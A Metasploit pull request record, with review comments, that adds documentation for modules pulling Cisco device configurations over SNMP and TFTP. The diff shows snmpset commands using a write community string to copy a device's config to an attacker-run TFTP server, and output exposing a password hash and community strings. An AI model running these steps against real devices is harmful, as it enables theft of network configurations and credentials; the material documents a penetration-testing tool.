### PR TITLE
cisco aux scanner snmp docs

### PR DESCRIPTION
**Pull request by h00die**
Adds documentation for `auxiliary/scanner/snmp/cisco_config_tftp` and `auxiliary/scanner/snmp/cisco_upload_file`

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/snmp/cisco_config_tftp` or `auxiliary/scanner/snmp/cisco_upload_file`
- [ ] `info -d`
- [ ] **Verify** formatting/spelling/etc

### CODE REVIEW

File: documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md [hunk 1]
```diff
@@ -0,0 +1,143 @@
...
+[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s "backup_config" 
+
+iso.3.6.1.4.1.9.9.96.1.1.1.1.6.666 = STRING: "backup_config"
+msf5 auxiliary(server/tftp) > snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1 
+[*] exec: snmpset -v 1 -c private 2.2.2.2 .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1 
+
+iso.3.6.1.4.1.9.9.96.1.1.1.1.14.666 = INTEGER: 1
+```
+
+3. At this point the config is transfering, we need to wait a few seconds.  Lastly, we'll remove `666` from the system.
```
Comment (bcoles) [inline documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md]: `transferring`

File: documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md [hunk 2]
```diff
@@ -0,0 +1,143 @@
...
+[+] 2.2.2.2:161 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
+[+] 2.2.2.2:161 SNMP Community (RO): public
+[+] 2.2.2.2:161 SNMP Community (RW): private
+[*] Shutting down the TFTP service...
+[*] Auxiliary module execution completed
+```
+
+### Manual Interaction
+This process can also be executed manually utilizing Metasploit's TFTP server.
+Cisco's (documentation)[https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup]
```
Comment (bcoles) [inline documentation/modules/auxiliary/scanner/snmp/cisco_config_tftp.md]: Malformed markdown.

Should be:

```
[documentation](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
```

**Review by bcoles — CHANGES_REQUESTED** [review]

**Comment by h00die** [comment]
#8296

**Comment by h00die** [comment]
all fixed, thanks for checking

**Review by bcoles — APPROVED** [review]

**Pull request merged**